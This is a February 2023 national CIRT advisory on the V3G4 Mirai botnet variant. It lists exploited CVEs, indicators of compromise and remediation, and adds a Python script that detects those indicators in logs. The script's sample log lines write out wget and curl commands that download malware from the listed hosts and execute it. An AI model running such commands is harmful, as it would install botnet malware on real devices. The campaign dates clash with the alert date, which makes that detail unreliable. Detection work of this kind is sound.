New Mirai variant targets Linux devices (February 21, 2023)

Ref# AL2023_18 | Date: Feb 21st 2023

Description  

A new Mirai malware variant tracked as V3G4 was seen exploiting over ten vulnerabilities to breach Linux devices and establish them as a DDoS botnet. 

Details 

Researchers from Unit 42 observed the new Mirai variant's activity in three campaigns between July and December 2023. The campaigns are believed to be operated by the same unknown threat actor because: 

  • The same hardcoded command and control (C2) domain was used in all three campaigns. 

  • The malware shell script downloaders are very similar for all three campaigns. 

  • The botnet samples use the same XOR decryption key. 

  • The botnet samples use the same process termination list. 

  • The botnet samples use very similar functions. 

V3G4 gains initial access to Linux devices by exploiting 13 vulnerabilities that grant the threat actor remote code execution (RCE). The vulnerabilities exploited include the following:  

  1. CVE-2012-4869: FreePBX Elastix Remote Command Execution Vulnerability 

  2. Gitorious Remote Command Execution Vulnerability 

  3. CVE-2014-9727: FRITZ!Box Webcam Remote Command Execution Vulnerability 

  4. Mitel AWC Remote Command Execution Vulnerability 

  5. CVE-2017-5173: Geutebruck IP Cameras Remote Command Execution Vulnerability 

  6. CVE-2019-15107: Webmin Command Injection Vulnerability 

  7. Spree Commerce Arbitrary Command Execution Vulnerability 

  8. FLIR Thermal Camera Remote Command Execution Vulnerability 

  9. CVE-2020-8515: DrayTek Vigor Remote Command Execution Vulnerability 

  10. CVE-2020-15415: DrayTek Vigor Remote Command Injection Vulnerability 

  11. CVE-2022-36267: Airspan AirSpot Remote Command Execution Vulnerability 

  12. CVE-2022-26134: Atlassian Confluence Remote Code Execution Vulnerability 

  13. CVE-2022-4257: C-Data Web Management System Command Injection Vulnerability 

Once a device has been compromised, the wget and curl utilities are used to download the Mirai malware sample and execute it. The malware contains a list of process names; it checks the compromised system and terminates any running process that matches an entry in the list. Some of the listed process names belong to other botnet malware families and even to other Mirai variants. The malware then attempts to connect to its hardcoded C2 server (abc.8×19.com). It receives botnet commands directly from the C2 server in the form of encrypted strings. These command strings are decrypted using four rounds of XOR decryption keys, and the commands include TCP, UDP, SYN and HTTP DDoS flooding methods.  

V3G4 can also infect other devices on a network using its telnet/SSH scanner function. The malware scans for these protocols and attempts to spread itself by brute forcing weak username/password combinations. 

Indicators of Compromise 

The following is a list of IoCs related to the V3G4 malware: 

  1. C2 server: abc.8×19.com, comeanalyze.8×19.com 

  2. Malware Host: 176.123.9.238, 198.98.49.79, 104.244.72.64 
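As an added example (not part of this alert or of the Unit 42 research), the following Python script matches the indicators listed above against DNS and shell log lines and flags the wget/curl download pattern described in the Details section. The log format and the sample lines are constructed assumptions.

```python
import re

# Indicators as printed in the advisory. The "×" in the printed C2 domains is
# folded to a plain "x" during matching, in case it is a rendering artefact.
C2_DOMAINS = {"abc.8×19.com", "comeanalyze.8×19.com"}
MALWARE_HOSTS = {"176.123.9.238", "198.98.49.79", "104.244.72.64"}

IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
HOSTNAME = re.compile(r"\b[a-z0-9][a-z0-9.-]*\.[a-z]{2,}\b")
DOWNLOADER = re.compile(r"\b(?:wget|curl)\b[^|;&]*https?://")

def normalize(text):
    """Lower-case and fold the printed '×' to 'x' so indicators and logs compare."""
    return text.lower().replace("×", "x")

NORMALIZED_C2 = {normalize(d).rstrip(".") for d in C2_DOMAINS}

def classify(line):
    """Return the V3G4 indicators a single log line matches (empty list if none)."""
    text = normalize(line)
    reasons = []
    for host in HOSTNAME.findall(text):
        if host.rstrip(".") in NORMALIZED_C2:
            reasons.append(f"C2 domain {host}")
    for ip in IPV4.findall(text):
        if ip in MALWARE_HOSTS:
            reasons.append(f"malware host {ip}")
    # The advisory says wget/curl pull the sample after exploitation; flag that
    # pattern only when the line also references one of the listed hosts.
    if reasons and DOWNLOADER.search(text):
        reasons.append("wget/curl download from listed host")
    return reasons

def scan(lines):
    """Scan log lines; return (1-based line number, reasons) for every hit."""
    return [(n, r) for n, line in enumerate(lines, 1) if (r := classify(line))]

# Constructed sample log lines for demonstration (not real captures).
SAMPLE_LOGS = [
    "Feb 21 10:01:02 dns named[123]: query: abc.8x19.com IN A from 10.0.0.5",
    "Feb 21 10:01:05 cam1 sh: wget http://176.123.9.238/x86 -O /tmp/x86; chmod +x /tmp/x86",
    "Feb 21 10:01:07 dns named[123]: query: updates.example.org IN A from 10.0.0.6",
    "Feb 21 10:01:09 cam1 sh: curl -s http://198.98.49.79/arm7 | sh",
]

if __name__ == "__main__":
    for n, reasons in scan(SAMPLE_LOGS):
        print(f"line {n}: {', '.join(reasons)}")
```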

Remediation 

Since this malware relies on exploiting the 13 vulnerabilities mentioned above, it is highly recommended to apply patches and updates to Linux devices to address these issues as soon as possible. 

The Guyana National CIRT recommends that users and administrators review this alert and apply the recommendations where necessary. 

